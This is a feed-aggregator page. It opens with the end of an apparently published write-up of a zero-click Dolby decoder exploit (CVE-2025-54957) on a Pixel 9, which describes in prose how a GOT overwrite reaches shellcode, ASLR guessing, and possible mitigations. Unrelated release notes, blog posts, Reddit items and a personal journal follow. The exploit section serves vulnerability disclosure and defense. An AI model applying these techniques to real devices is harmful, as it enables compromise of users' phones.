These syncframes copy the pointer to `pwrite` to the `direct_call_fptr` (entry 14), using the same method as other pointer copies from the dynamic buffer. `pwrite` is immediately called, overwriting `__stack_chk_fail` with the shellcode.

88_write_scf
This syncframe partially overwrites the indirect call register, so it points to the GOT entry for `__stack_chk_fail`. `__stack_chk_fail` immediately executes, running the shellcode!

How reliable is this exploit?
Due to ASLR guessing, this exploit works roughly 1 in 255 times. There is one other source of unreliability. Occasionally, binder performs a secondary allocation while the exploit is running, in which case, header checks fail and it crashes. This happens a lot when the debugger is attached, but I observed it less than 10% of the time when the process is running normally.
Another question is whether the exploit could be made more reliable. I have two ideas in this regard, both of which would require substantial development effort.
To remove the 1/16 probability when guessing the dynamic buffer location, it might be possible to overwrite the second lowest byte of the prev pointer in the dynamic buffer allocation before exploitation starts. As discussed previously, this causes the buffer to be reallocated at that address, so this would have the end result of moving the allocation to a consistent offset from `dynamic_base` before the exploit runs.

The challenge here would be to find a way to write to the header of the dynamic buffer while only overwriting the lowest byte of the pointer, as this is the only byte that can be overwritten without knowing the ASLR bits. One possibility is using the bap write feature of the decoder, as it writes data close to the skip pointer, but very limited data can be written. The `evod_process` function also writes to low addresses of the skip buffer after the EMDF container is parsed, so it might be possible to use this write as well.

This strategy would not make determining the dynamic buffer allocation 100% reliable, because the location where the dynamic buffer is reallocated needs to be mapped. For example, if an allocation at `dynamic_base + 0x3000` has its prev pointer overwritten to be `dynamic_base + 0xF000`, it will be shifted to that address, but if an allocation at `dynamic_base + 0xF000` is overwritten to be `dynamic_base + 0x3000`, it will crash when scudo attempts to write a heap header to the lower address, because that memory is not mapped. Overwriting the prev pointer to `dynamic_base + 0xF000` would theoretically always work, but that would limit DYNAMIC WRITE to addresses between `dynamic_base + 0xF000` and `dynamic_base + 0xFFFF`, because the primitive can only overwrite bytes in the address it writes to; it cannot increment the third lowest byte to extend this range. So this strategy would require reducing the amount of memory in the dynamic buffer that the exploit needs, but if that's possible, it could potentially remove the unreliability caused by the second nibble randomization of the dynamic buffer.
To remove the 1/16 probability when guessing the load address of `libcodec2_soft_ddpdec.so`: if it were possible to copy a pointer to the dynamic buffer, it would then be possible to use the second nibble of that pointer as the `emdf_container_length` of a syncframe. For most lengths, it's then possible to craft an EMDF container that does not trigger the bug if the length is too short, because the bytes triggering the bug aren't processed, and does not trigger it if the length is too long (since `evo_parse_payload` is called twice and the bug triggers on the second call, an invalid payload placed after the trigger prevents it from running). Then, a series of syncframes that work with all 16 possible library offsets could be crafted, and only the correct ones would be processed.

The real challenge here would be copying from the static buffer to the dynamic buffer without guessing the library location, as both the direct and indirect calls available are quite limited. But if this were possible, the unreliability due to not knowing the library load address could be avoided, at the cost of substantial development effort.
Overall, I suspect it’s possible to substantially improve the reliability of this exploit, though it would likely require several months more development effort.
Reflections on Mitigations
My progress writing this exploit was impeded by several Android platform mitigations, while others were not as effective as I expected, so I want to take this chance to reflect on what worked and what can be improved.
ASLR was by far the most challenging mitigation to bypass; this exploit would have been substantially easier to write without it. Partially overwriting pointers to bypass ASLR is a common exploit strategy, and I was surprised by how much more difficult randomization of the low bits of the pointer made it. While it's also important that pointers have enough overall randomization that they can't be guessed, my takeaway from this is that randomization of low address bits does a lot more to increase exploit development time than randomization of high bits.
I also performed a lot of testing of Android ASLR, and I did not find any areas that were not randomized enough to prevent exploitation. This has not always been true of Android in the past, and I was pleased to see that Android ASLR appears to be well implemented and tested.
SELinux also made exploitation more difficult, as a lot of ‘classic’ techniques for running shellcode didn’t work, and I was lucky to have access to experts like Seth and Jann who could help me understand the restrictions on the system and how to get around them. That said, that is likely a one-time cost for attackers: once they learn strategies for bypassing SELinux, they will work for multiple exploits.
The `mediacodec` context usually has seccomp rules that prevent a process from executing syscalls that aren't needed for its normal functionality. A policy is implemented in AOSP, and I tested that the Samsung S24 enforces this policy on its media decoding processes. However, this was somehow left out of the Pixel 9. A seccomp policy similar to Samsung's would have prevented the call to `pwrite` used by the exploit. This wouldn't have prevented exploitation, as every syscall needed to access the BigWave vulnerability this exploit chains into must be callable by the decoder process for decoding to function correctly, but it likely would have forced the exploit to be written entirely in ROP, versus jumping to shellcode. This would have added at least a few more weeks of exploit development effort.
Likewise, the accessibility of `/proc/self/mem` was a big shortcut to exploitation. Since it is only used during debugging, I wonder if it is possible to implement some sort of mitigation that makes it inaccessible when a device is not being debugged.

scudo also lacked mitigations that could have made this exploit much more difficult, or even impossible. It was surprisingly easy to modify secondary headers to 'trick' the allocator into moving an allocation; in the primary partition, this would have been prevented by checksums. While vulnerabilities that allow a scudo secondary header to be modified are fairly rare, as every scudo secondary allocation is preceded by a guard page, the performance cost of adding checksums to the secondary partition would likely be limited, as in most applications there are far fewer secondary allocations than primary allocations.
It's also important to note that part of why this vulnerability was exploitable in a 0-click context is that it is an exceptionally high-quality bug. It provided both the ability to leak memory and the ability to overwrite it, with a high level of control over each, and the structures that could be corrupted by the overwrite were unusually fortuitous. That said, the memory layout that enabled this isn't unusual among media decoders. For example, the H264 decoder that I reported this 2022 vulnerability in has a similar layout, with large structs, and could potentially be prone to similar exploitation techniques involving overflows between struct members.
On Mac and iOS devices we tested, the UDC is compiled with -fbounds-safety, a compiler mitigation which injects bounds checks into a compiled binary, including the bounds of arrays within C structs. We believe CVE-2025-54957 is not exploitable on binaries compiled with this mitigation. While there is a performance cost, compiling all media libraries with this flag would greatly reduce the number of exploitable vulnerabilities of this type. Even in situations where this is not practical in production, testing and fuzzing media libraries with -fbounds-safety enabled could make it easier to find and fix this type of exceptionally exploitable vulnerability.
The Next Step
Now that we’ve gained code execution in the mediacodec context, it is time to escalate to kernel! Stay tuned for Part 2: Cracking the Sandbox with a Big Wave.
-
🔗 batrachianai/toad The Shelled Release release
[0.5.30] - 2026-01-14
Fixed
- Fixed Terminals not focusing on click
- Fixed tool calls not rendered
- Fixed Kimi run command
- Fixed permissions screen not displaying if "kind" is not set
Added
- Added reporting of errors from acp initialize call
- Added Interrupt menu option to terminals
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 release rss
sync repo: +1 release ## New releases - [Sharingan](https://github.com/n0pex3/sharingan): 1.0.2 -
🔗 HappyIDA/HappyIDA v1.0.0 release
Full Changelog : https://github.com/HappyIDA/HappyIDA/commits/v1.0.0
-
🔗 HexRaysSA/plugin-repository commits fix typo rss
fix typo -
🔗 HexRaysSA/plugin-repository commits add arkup/tc_deer to known-repositories.txt rss
add arkup/tc_deer to known-repositories.txt -
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +2 releases rss
sync repo: +1 plugin, +2 releases ## New plugins - [Sharingan](https://github.com/n0pex3/sharingan) (1.0.0) ## New releases - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin): 0.2.6 -
🔗 r/wiesbaden Hainerberg Taco Bell Menu rss
Not an advertisement, posted for informational purposes. The Taco Bell is on a US military base. You must have access to US installations or be accompanied by someone with access and pass a security check. I will not provide access to anyone. I might do a one time Taco Bell party off the base, if there is interest and someone is willing to host.
submitted by /u/OldBayExorcism
[link] [comments] -
🔗 r/reverseengineering Game Reverse Engineering - One Hit Kills Hack rss
submitted by /u/chaiandgiggles0
[link] [comments] -
🔗 HexRaysSA/plugin-repository commits sync repo: ~1 changed rss
sync repo: ~1 changed ## Changes - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin): - 0.2.1: archive contents changed, download URL changed -
🔗 SparkFun Tutorials What's the difference between the ZED-F9P and the ZED-X20P? rss
What's the difference between the ZED-F9P and the ZED-X20P?
Available online at:
Introduction
The ZED-X20P is u-blox's GNSS receiver designed as a successor to the wildly popular ZED-F9P. It has improvements in accuracy, band reception, and power consumption. Here, we outline the key differences between our ZED-F9P and ZED-X20P breakout boards so you know exactly how to upgrade your projects to the newest technology.
Comparison of Features
u-blox provides the following table comparing key high-level differences between the features on the ZED-F9P and the ZED-X20P:
We've also compiled the differences between the chips across more specific features:
Parameter | ZED-F9P | ZED-X20P
---|---|---
PPS Accuracy | 30 ns | 20 ns
Convergence Time | < 10 s | < 7 s
Max Velocity | 500 m/s | 300 m/s
Velocity Accuracy | 0.05 m/s | 0.03 m/s
Backup Battery Current | 45 µA | 32 µA
SW Backup Current | 1400 µA (1.4 mA) | 93 µA
Peak Current | 130 mA | 80 mA
Acquisition Current | 95 mA | 68 mA
Tracking Current | 93 mA | 64 mA
Notes: u-blox has recently removed support for the GLONASS GNSS constellation. This is not accounted for in the listed current consumption of the ZED-X20P.
Hardware Changes
With the exception of the added JST connector and the adjusted location of the BlueSMiRF header, the overall board dimensions, edge connectors and screw-hole locations, and PTH pin layout are exactly the same.
Allband GNSS RTK Breakout - ZED-X20P (Qwiic)
GPS-RTK-SMA Breakout - ZED-F9P (Qwiic)
GPS-RTK2 Board - ZED-F9P (Qwiic)



Antenna Connection
Connector Options
With the ZED-F9P we released two different boards with either a U.FL connector or an SMA connector to attach a GNSS antenna. With the ZED-X20P, we have released a single board with both options with a jumper to select the connector to be used.
SMA: The location of the SMA connector remains the same.
U.FL: The U.FL connector’s location is slightly different by a couple millimeters. There was a hole in the board to pass a U.FL cable through.
Notes: We did our best to maintain an impedance match between the two different connections. Users may experience a small shift in the signal’s impedance after altering their board. However, in our experience, the GNSS receiver was still functional after modifying the jumper and we didn’t really notice a degradation in performance.
Length of SMA Connector
We recently changed suppliers for our SMA connector, so users will eventually see a slightly longer SMA connector on future boards.


Old version: 6.3mm
New version: 8mm
BlueSMiRF Header Location
On the ZED-F9P boards, the BlueSMiRF PTH pins were located at the edge of the board. For the ZED-X20P, we have added a locking JST connector in its place, to allow users to easily attach an RF transceiver. Therefore, the BlueSMiRF header was relocated to the interior of the board.
Notes: The pin layout of the BlueSMiRF header remains the same, connecting to the UART2 interface of the GNSS receiver. On the ZED-X20P, we added a VSEL jumper for users to switch between either a 5V or 3.3V input/output voltage for the BlueSMiRF header.
Pin Functionality
Most of the pin functionality remains the same, with the exception of a single pin. The safeboot pin on the ZED-X20P board was relocated to a test point and replaced with the enable pin for the RT9080 LDO.


ZED-F9P: Safeboot Pin
ZED-X20P: RT9080 Enable Pin
Notes: The SPI interface is enabled with the DSEL jumper for the ZED-F9P; meanwhile, for the ZED-X20P, it is enabled with the SPI jumper. The operation of these jumpers remains the same; only the name changed on the silkscreen. Similarly, the EVENT and INT pins are both external interrupt pins; only the name changed on the silkscreen.
UART Interface
Baud rate:
- ZED-F9P: 9600-921600 bps
- ZED-X20P: 4800-8000000 bps
Notes: Default baud rate is 38400 bps. The ZED-F9P only supports the RTCM protocol up to v3.3
SPI Interface
Max transfer rate:
- ZED-F9P: 125 kB/s
- ZED-X20P: 880-950 kB/s
Max clock speed:
- ZED-F9P: 5.5 MHz
- ZED-X20P: 7.25-12.8 MHz
Notes: The transfer rate for the ZED-X20P is based on the load capacitance. SPI interface must be enabled by the jumper.
I2C Interface
The ZED-F9P only supported I2C fast mode, while the ZED-X20P supports standard mode, fast mode, and fast mode plus.
Max bit rate:
- ZED-F9P: 400 kbit/s
- ZED-X20P: 1000 kbit/s
USB Interface
While both boards provide a USB-C connection to the GNSS receiver, on the ZED-X20P we would advise users not to rely on this interface in their designs.
Notes: For the ZED-X20P, we broke out this interface as part of a preliminary design recommendation. However, u-blox has recently removed this interface from their latest datasheet. Therefore, we recommend that users not integrate this interface into their future designs, especially since it doesn't support firmware updates.
Software Changes
Firmware Upgrade
As mentioned above regarding the USB interface, it is only possible to perform firmware updates through the UART1 interface on the ZED-X20P.
Firmware upgrade through I2C (Qwiic) is possible, but is only for advanced users. You need (e.g.) a Thing Plus board running a sketch to convert USB UART to I2C. Then you need to run the u-blox ubxfwupdate.exe from the command line with some special settings.
u-center Application
One of the biggest changes between the two GNSS receivers is the u-center software application. u-blox recommends their new u-center 2 software application for any GNSS engine, generation 10 or later.
The first difference users will notice between the two applications is the required user account for u-center 2. While users need internet access to log in initially, they will not need internet access or to log in afterwards.
Beyond a new look and feel, the primary difference in functionality between the two applications is that the new generation 10 GNSS engines implement a new set/get method for the values in the configuration layers of the GNSS receiver. This is handled in the backend of the software application, but should be noted for any development purposes.
Some other notes to mention:
- The new workspace configuration allows users to save setups and layouts when testing different GNSS receivers.
- With the required login, u-blox also integrates their new PPP services and their support portal in the u-center 2 application for users.
- u-blox also wrote up this blog post with a few tips and tricks for the new software application.
Notes: Nate has found that if users wish to continue using the original version of u-center (not u-center 2), they just need to use the generation 9 advanced configuration view. See Section 5.2.7 Generation 9 configuration view of this manual.
Arduino Library
With the introduction of the set/get method for configuration values for the gen 10 GNSS engines, our Arduino library got a new release (v3). The Arduino library should be mostly backwards compatible, with a few minor changes; see below for more information:
learn.sparkfun.com | CC BY-SA 3.0 | SparkFun Electronics | Niwot, Colorado
-
🔗 @cxiao@infosec.exchange If you know anyone in the Iranian-Canadian community, you know how hard the mastodon
If you know anyone in the Iranian-Canadian community, you know how hard the loss of Flight PS752 affected them. Entire families were lost, and some communities, like the Persian community in Richmond Hill, were especially devastated.
In recent days, these communities have had to deal with not only remembering the 6th anniversary of this tragedy, but have also had to watch as the same perpetrators of this crime, the IRGC and the rest of the regime, have slaughtered Iranian protestors without the world paying any attention. And now that Iran is past the 132nd hour of a complete internet shutdown, and at the same time reports of thousands of casualties are emerging, they need to worry about whether their loved ones are safe.
I encourage all Canadians to read the statement by the Association of Families of Flight PS752 Victims about what is happening now: https://www.ps752justice.com/statement-of-the-association-of-families-of- flight-ps752-victims-regarding-the-internet-shutdown-and-killings-in- iran/
I have made a donation to the Association as well, for their continued work in remembering the victims, supporting the families, and calling for justice in Iran.
You can read about the victims here as well: https://www.cbc.ca/news2/interactives/flightps752/
-
🔗 sacha chua :: living an awesome life La semaine du 5 janvier au 11 janvier rss
Lundi, le cinq janvier
Ma fille est devenue grincheuse probablement à cause d'une mauvaise communication ce matin. Elle n'a pas continué à l'école aujourd'hui. Elle n'est pas allée au cours de gym parce qu'elle était de mauvaise humeur. Elle est restée dans sa chambre toute la journée. Alors, s'inquiéter, ça ne sert à rien. Au lieu de stresser, j'ai déneigé. La neige était légère, et le fait de déneiger m'a changé les idées. Ensuite, je me suis préparée pour ma session avec ma tutrice. En addition des entrées de cette semaine, nous avons aussi révisé une entrée de la semaine dernière.
Elle n'a pas besoin d'un câlin, mais elle est revenue pour le déjeuner. Elle m'a permis de lui brosser les dents et de lui nettoyer ses piercings.
J'ai écrit mon bulletin Emacs pendant une diffusion en direct. Quelques spectateurs ont fait des commentaires. ( Merci ! ) J'ai besoin d'ajuster la configuration de l'audio. Un jour, ce sera plus facile.
Maintenant, c'est le moment de l'inscription pour l'école. Je vais me renseigner sur le processus pour l'année prochaine, au cas où nous déciderons d'expérimenter l'instruction en famille pour le reste de l'année. Je vais aussi me renseigner sur le processus au cas où nous l'inscririons en cours d'année. Nous allons recevoir le carnet de notes en février. Alors que ma fille semble passer son temps à ne rien faire, cela reste instructif. Je pense que ma fille peut trouver son propre chemin. Malgré notre grande liberté et les nombreuses tentations de flâner, mon mari et moi continuons d'apprendre chaque jour. Ma fille aime proposer sans cesse des idées d'amélioration. Des familles que nous connaissons et qui vivent selon les principes de l'apprentissage libre semblent développer des passions intéressantes.
Pour le souper, j'ai préparé du bœuf salé en boîte. Ma fille et moi l'avons mangé avec du riz et du pak-choï.
Mardi, le six janvier
Nous nous sommes levés très tôt et nous sommes allés à l'hôpital pour l'examen médical de ma fille. Elle a dû jeûner et boire seulement de l'eau et du jus de pomme. Nous sommes arrivés exactement à l'heure (trente minutes avant le rendez-vous). Après environ trente minutes d'attente au-delà de l'heure prévue du rendez-vous, elle a eu l'échographie. C'est correct, donc je l'ai emmenée dehors pour manger sur le pouce avant son deuxième rendez-vous. Le médecin a dit que tout allait bien et nous n'avons pas besoin de plus de rendez-vous avec eux l'année prochaine. Après l'examen, elle voulait aller à l'espace de jeux de l'hôpital. Elle a colorié un dessin, elle a joué dans un petit café, et elle a joué aux trains.
Sur le chemin du retour, nous sommes passés chez Nella Cucina pour voir un couteau adapté aux enfants. Ma fille voulait un couteau comme un santoku parce que les aliments ne collent pas dessus. Tous les couteaux sont trop grands ou trop petits ou ne sont pas comme un santoku. Peut-être qu'elle devrait le chercher en ligne.
Elle avait si faim. Elle avait hâte de manger des nouilles instantanées avec plus de gâteau au poisson. Elle a utilisé la moitié du sachet d'épices et m'a donné l'autre moitié. J'ai préparé des nouilles conventionnelles. J'ai ajouté des algues et du gâteau au poisson, qu'elle m'a presque tout piqué. Elle avait très faim. Ce n'était pas grave, j'ai mangé du pain avec du beurre.
After all that, I called her school to find out what the procedure would be if we withdrew her and then wanted to re-enroll her. The secretary wasn't sure, so I ended up talking to the principal, which was a bit embarrassing. Still, I learned that:
- Almost all of the virtual school's students are staying, aside from a few who are going back to in-person school.
- They get one or two requests a day outside the normal registration period and have to turn down almost all of them, except for serious cases such as medical reasons.
- If our daughter continues, her spot is guaranteed for next year.
- If I register her for next year before January 23:
- If they offer us a spot in February and our daughter withdraws, she could come back to the virtual school.
- If they don't offer us a spot and our daughter withdraws and then changes her mind, she might not get an exception and we would have to wait until the following year.
- If I don't register her for next year and our daughter withdraws and then changes her mind, we would probably have to wait until the following year.
Can we accept her unhappiness with the current situation? Can we accept the uncertainty for more than a year? I think we can wait until things become clearer.
Wednesday, January 7
I was a bit tired when I got up. Instead of exercising, I shovelled snow away from the drains and tried to bail out the puddle on the sidewalk. It was too hard because the snow had turned to ice. Oh well.
A reflection on my daughter's learning:
My daughter likes reading. She reads for pleasure and discusses books with us, a bit like the homework her teacher wants her to do but that she doesn't do. We enjoy the interesting words she picks up from reading and can pull out at just the right moment. "I'm ravenously hungry," she says. Thanks to my own French learning, I can share my own exultation when I find a magnificent new word.
My daughter likes math. She loves exercising her brain by calculating and solving problems I give her. She finds the class boring because it's too slow. She finds the simple programming in Minecraft Education too easy. She asks me for more challenges and tries other exercises on her own, thanks to the Beast Academy books.
My daughter likes tossing out all sorts of ideas for improvements or businesses. For example, when she plays shopkeeper, she makes her own real snacks and sells them to me for five high-fives.
I think school can help us develop her skills. Teachers can provide the outside assessment that I can't, because I don't have the experience. It's also a chance for her to practise managing her own tasks. After some initial resistance, my daughter is proud when she gets them done.
My husband thinks outside assessment is important. It's fine if our daughter gets low grades right now; the feedback may still be useful to her. I agree, so I can wait, especially since I haven't found an alternative we feel confident about. It's possible that her own work will be enough. If she's going to be grumpy at the system, the teacher, or me, I'd rather she be grumpy at the system and choose to succeed despite its limitations. We'll see.
Besides, most of the time it's fine, and she's proud that she can do things herself. It's okay.
I finally wrote a program to create or download the draft of the next Bike Brigade newsletter on Google Drive. I also wrote an Emacs function to create or update the Mailchimp campaign from the template. That means I can update the draft newsletter with fewer clicks. It simplifies my workflow. One day I want to automate the whole process except the writing, which the other volunteers can handle.
My daughter tried Pokémon on my husband's Game Boy Advance while I quizzed her on her homework and typed her answers. Sometimes I act as her secretary, which helps her a lot.
Thursday, January 8
Instead of following an exercise video, I took a shovel and dug a channel in the ice to drain the puddle on the sidewalk farther down the street. The forecast said tomorrow would be warmer, so maybe the channel will help keep the sidewalk from flooding (or at least flood less). It was good exercise. Afterwards my hands were very tired, so I focused on tasks that don't need much typing. I reviewed my Anki cards, improved my audio setup, and recorded a short video demonstrating my function for dictating a note onto the current task.
When my hands felt better, I did more programming. I want to automate running programs daily and weekly, for example renewing the books we've borrowed from the library, or my new program that drafts the Bike Brigade newsletter. However, my computer isn't on all the time. I looked into how to set up persistent jobs in systemd. That way, the jobs will run a little while after my computer boots, provided I've configured them correctly. We'll see tomorrow whether they actually run.
My daughter and I went for a walk during her lunch break, but we forgot that the library opens at 12:30 on Thursdays. She got a little grumpy because she can't wait to have more books, but the sun was shining and I kept the conversation light, so it was fine. She got back to virtual school just in time.
After school, I took my daughter to the park to play with her friend. Well, honestly, I think she played more with her friend's dog than with her friend. I guess it's just one of those days.
A Reddit thread got me thinking about Emacs buffers. I went back through my configuration for lots of usage examples, dictating notes with my new function so I could collect them along with links, which was very useful. I think I'll do a livestream before writing a post about it. When… Maybe Friday afternoon is a good time for that.
My daughter was curious about Pokémon because my husband was playing it on his Game Boy Advance. She asked me if I could find Pokémon White. I installed it in an emulator on my computer. Since my computer was busy, I resurrected my old machine and used it to SSH into my current computer so I could keep writing my journal, thanks to Linux being so server-friendly.
Friday, January 9
Success! According to my daughter, she can make her own lunch better than I can. This morning she redid it because I had torn the prosciutto into pieces that were too small. Now she can pack her own lunch and her own snack. She'll survive.
I tried to plan a livestream this morning about my Emacs configuration. In any case, I want to do it, so I might as well try sharing it live. I improved my process for dictating notes. Now I can take a screenshot automatically, and all the audio is saved with a timestamp.
In the afternoon the weather was nice, so I biked to the Stockyards to pick up the pyjamas I had bought for my daughter. I forgot to brush her teeth during the lunch break, so I did it during the afternoon recess.
I also tried speech recognition in Google Chrome. I modified a continuous speech recognition program to show previous utterances and send messages to a server, and I wrote a server that relays the messages to Emacs. In Emacs, I displayed the messages in a buffer. Speech recognition in Google Chrome is faster than WhisperX and can handle a stream, but it doesn't add punctuation and the quality is lower. I think it will be useful for recognizing several simultaneous streams during the next conference, or as a fallback while I'm livestreaming.
The wind was strong, so we stayed home. After school, my daughter dug into a volcano-shaped hidden-gems kit. She loves those kits. Once the gems were uncovered, I gave her some wire and showed her how to wire-wrap them.
We had Chinese buns for supper.
My daughter wanted to make a dress with ruffles that form short sleeves. (Maybe like this dress?) We looked at fabric online until I got overstimulated between all the choices and her chattering. I need quiet.
She went to her room, probably to play Minecraft. My husband worked on setting up RetroPie on the Raspberry Pi so my daughter can play Pokémon there instead of on my computer or on an old computer that needs a different video cable.
Saturday, January 10
My daughter asked for little pancakes for breakfast, so I made her tiny pancakes and a few heart-shaped ones. After the morning routine, she played mail carrier with household things. She delivered the cutlery to the kitchen drawer, the laundry to her bedroom drawers, the garbage to the bin, and other things all around the house.
I prepared the Bike Brigade newsletter. This time, I wrote a function to send a test message via Mailchimp from Emacs. Once I got confirmation from the other volunteer, I wrote a function to schedule the campaign on Mailchimp from Emacs. Now I can manage most of the campaign from Emacs without clicking around, which makes me happy.
In the afternoon, I took my daughter to the skating rink to play with her friend. Her friend's dad suggested a little race, but her friend looked sad and I know my daughter doesn't like competitive games, so we found other, more cooperative activities for them. The dad was already too fast to catch, but the friends had fun catching me a few times. I think they had even more fun chasing after her dad.
I built an interface for viewing and managing Pipewire audio routing from Emacs. I want to record, livestream, and run speech recognition on my own voice or on the audio stream, possibly all at the same time, which needs a loopback with a bit of latency to avoid audio dropouts. I was so absorbed in that that I forgot to do the dishes. My husband cooked gyudon and bok choy, did the dishes, and ate by himself, which is not how things usually go. Anyway, next time I'll do the dishes.
After my supper, I went to check on her. She was grumpy. She was probably hungry and cold, and felt lonely waiting for me. I managed to defuse the situation by offering supper and a game of marbles, which she accepted. She liked the gyudon. As promised, we played marbles. After that she was in a good mood. She played Pokémon. She worked on her homework while I helped her.
At bedtime, she and I took turns reading a book.
She said her teeth hurt, but she didn't want a painkiller or a cold compress. I offered her a silicone straw to chew on in case that helped.
Sunday, January 11
My daughter got up earlier than I did this morning and was a little impatient while she waited. I finally got up, but I was still a bit tired.
My daughter played Pokémon Yellow. She said it isn't fair that the game doesn't let you play as a girl instead of a boy. My husband found another ROM that allows it, so she restarted the game. I helped her while I did my exercise.
I took my daughter to her first skating lesson at the rink in the park. Seeing the other students struggle to stand up on the ice, my daughter told me I had signed her up for the wrong class. She found Learn to Skate 1 too easy. Fortunately, the teacher was able to take her over to the other side of the rink, where she joined Learn to Skate 2, which ran at the same time. She enjoyed the lesson. On the other rink, I copied the drills the teachers were showing the kids. After the lesson, we skated together until she got too cold. When the Zamboni came onto the rink, everyone left the ice except one person, who brought their child onto it. My daughter and I were amused at how quickly the supervisor chased them off.
After getting home, I finished yesterday's entry.
Notes
- Pronunciation
- … au cas (silent s) où nous déciderons d'expérimenter l'instruction en famille pour le reste de l'année.
- Je pense que ma fille peut trouver son propre chemin. (sheuh mehn)
- Ma fille aime proposer sans cesse des idées d'amélioration. (dah mee lee oh rah seon)
- … nous sommes passés chez Nella Cucina pour voir un couteau adapté aux enfants. (ehn fehn)
- Elle avait hâte de manger des nouilles (nwee) instantanées (ein stahn tah nay) avec plus de gâteau au poisson.
- Elle a utilisé la moitié du sachet d'épices et m'a donné l'autre moitié. (mwah teay)
- … pendant que je l'interrogeais (lein tey roh jeas) sur ses devoirs et je tapais ses réponses.
- … ou du moins, moins d'inondations (dein non dah seons)
- … je me suis concentrée sur les tâches qui ne nécessitent (neh sess seet)
- Succès ! (suk say)
- … ce qui nécessite un loopback avec un peu de latence pour éviter les coupures (coo puurs) audio.
- Wording
- en addition de
- in addition to
- bref
- anyway, in short
- alors que
- while
- (no term)
- en … - gérondif: use present participle (ex: patinant)
- (no term)
- plus-que-parfait for things that happened before the passé composé
You can e-mail me at sacha@sachachua.com.
-
🔗 organicmaps/organicmaps 2026.01.14-6-android release
• NEW: Higher-contrast dark theme colors
• NEW: Google Assistant for navigation and search
• OSM map data as of January 11
• “Auto” navigation theme setting follows the system dark/light mode
• Thinner subway lines
• Search results show capacity for motorcycle parking, bicycle rental, bicycle charging, and car charging
• Show floor level in search results
• Albanian translations and TTS voice guidance
• Updated FAQ and app translations
• Fixed crashes
…more at omaps.org/news. See a detailed announcement on our website when app updates are published in all stores.
You can get automatic app updates from GitHub using Obtainium.
sha256sum:
85c1bb509b7901e9d01e0c336ec0c705b4a571f1b1570c6441c4423a945147a6 OrganicMaps-26011406-web-release.apk -
🔗 r/LocalLLaMA GLM-Image is released! rss
GLM-Image is an image generation model that adopts a hybrid autoregressive + diffusion decoder architecture. In general image generation quality, GLM‑Image aligns with mainstream latent diffusion approaches, but it shows significant advantages in text-rendering and knowledge‑intensive generation scenarios. It performs especially well in tasks requiring precise semantic understanding and complex information expression, while maintaining strong capabilities in high‑fidelity and fine‑grained detail generation. In addition to text‑to‑image generation, GLM‑Image also supports a rich set of image‑to‑image tasks including image editing, style transfer, identity‑preserving generation, and multi‑subject consistency. Model architecture: a hybrid autoregressive + diffusion decoder design. submitted by /u/foldl-li
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 release rss
sync repo: +1 release ## New releases - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin): 0.2.1 -
🔗 Rust Blog What does it take to ship Rust in safety-critical? rss
This is another post in our series covering what we learned through the Vision Doc process. In our first post, we described the overall approach and what we learned about doing user research. In our second post, we explored what people love about Rust. This post goes deep on one domain: safety-critical software.
When we set out on the Vision Doc work, one area we wanted to explore in depth was safety-critical systems: software where malfunction can result in injury, loss of life, or environmental harm. Think vehicles, airplanes, medical devices, industrial automation. We spoke with engineers at OEMs, integrators, and suppliers across automotive (mostly), industrial, aerospace, and medical contexts.
What we found surprised us a bit. The conversations kept circling back to a single tension: Rust's compiler-enforced guarantees cover much of what Functional Safety Engineers and Software Engineers in these spaces spend their time preventing, but once you move beyond prototyping into the higher-criticality parts of a system, the ecosystem support thins out fast. There is no MATLAB/Simulink Rust code generation. There is no OSEK or AUTOSAR Classic-compatible RTOS written in Rust or with first-class Rust support. The tooling for qualification and certification is still maturing.
Quick context: what makes software "safety-critical"
If you've never worked in these spaces, here's the short version. Each safety-critical domain has standards that define a ladder of integrity levels: ISO 26262 in automotive, IEC 61508 in industrial, IEC 62304 in medical devices, DO-178C in aerospace. The details differ, but the shape is similar: as you climb the ladder toward higher criticality, the demands on your development process, verification, and evidence all increase, and so do the costs.1
This creates a strong incentive for decomposition: isolate the highest-criticality logic into the smallest surface area you can, and keep everything else at lower levels where costs are more manageable and you can move faster.
We'll use automotive terminology in this post (QM through ASIL D) since that's where most of our interviews came from, but the patterns generalize. These terms represent increasing levels of safety-criticality, with QM being the lowest and ASIL D being the highest. The story at low criticality looks very different from the story at high criticality, regardless of domain.
Rust is already in production for safety-critical systems
Before diving into the challenges, it is worth noting that Rust is not just being evaluated in these domains. It is deployed and running in production.
We spoke with a principal firmware engineer working on mobile robotics systems certified to IEC 61508 SIL 2:
"We had a new project coming up that involved a safety system. And in the past, we'd always done these projects in C using third party stack analysis and unit testing tools that were just generally never very good, but you had to do them as part of the safety rating standards. Rust presented an opportunity where 90% of what the stack analysis stuff had to check for is just done by the compiler. That combined with the fact that now we had a safety qualified compiler to point to was kind of a breakthrough." -- Principal Firmware Engineer (mobile robotics)
We also spoke with an engineer at a medical device company deploying IEC 62304 Class B software to intensive care units:
"All of the product code that we deploy to end users and customers is currently in Rust. We do EEG analysis with our software and that's being deployed to ICUs, intensive care units, and patient monitors." -- Rust developer at a medical device company
"We changed from this Python component to a Rust component and I think that gave us a 100-fold speed increase." -- Rust developer at a medical device company
These are not proofs of concept. They are shipping systems in regulated environments, going through audits and certification processes. The path is there. The question is how to make it easier for the next teams coming through.
Rust adoption is easiest at QM, and the constraints sharpen fast
At low criticality, teams described a pragmatic approach: use Rust and the crates ecosystem to move quickly, then harden what you ship. One architect at an automotive OEM told us:
"We can use any crate [from crates.io] [..] we have to take care to prepare the software components for production usage." -- Architect at Automotive OEM
But at higher levels, third-party dependencies become difficult to justify. Teams either rewrite, internalize, or strictly constrain what they use. An embedded systems engineer put it bluntly:
"We tend not to use 3rd party dependencies or nursery crates [..] solutions become kludgier as you get lower in the stack." -- Firmware Engineer
Some teams described building escape hatches, abstraction layers designed for future replacement:
"We create an interface that we'd eventually like to have to simplify replacement later on [..] sometimes rewrite, but even if re-using an existing crate we often change APIs, write more tests." -- Team Lead at Automotive Supplier (ASIL D target)
Even teams that do use crates from crates.io described treating that as a temporary accelerator, something to track carefully and remove from critical paths before shipping:
"We use crates mainly for things in the beginning where we need to set up things fast, proof of concept, but we try to track those dependencies very explicitly and for the critical parts of the software try to get rid of them in the long run." -- Team lead at an automotive software company developing middleware in Rust
In aerospace, the "control the whole stack" instinct is even stronger:
